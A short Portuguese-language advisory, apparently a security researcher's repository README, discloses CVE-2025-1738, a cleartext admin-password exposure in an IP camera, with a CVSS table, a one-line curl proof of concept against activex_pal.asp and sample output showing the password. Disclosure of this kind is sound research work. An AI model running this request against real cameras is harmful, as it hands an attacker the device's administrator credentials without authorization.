
Descobrir 0day CVE-2025-1738
Após divulgação responsável, duas CVEs oficiais foram atribuídas.
| CVE | CVSS v3.1 | Pontuação | CWE | Tipo |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Exposição de Senha em Texto Claro |
Qualquer usuário local pode obter a senha do administrador em texto claro sem precisar de autenticação prévia.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
A senha do administrador é retornada em texto claro no corpo da resposta.
activex_pal.asp e mblogin.asp.Este repositório é apenas para pesquisa de segurança educacional e autorizada. Os autores não são responsáveis por qualquer uso indevido. Sempre obtenha permissão explícita antes de testar qualquer dispositivo.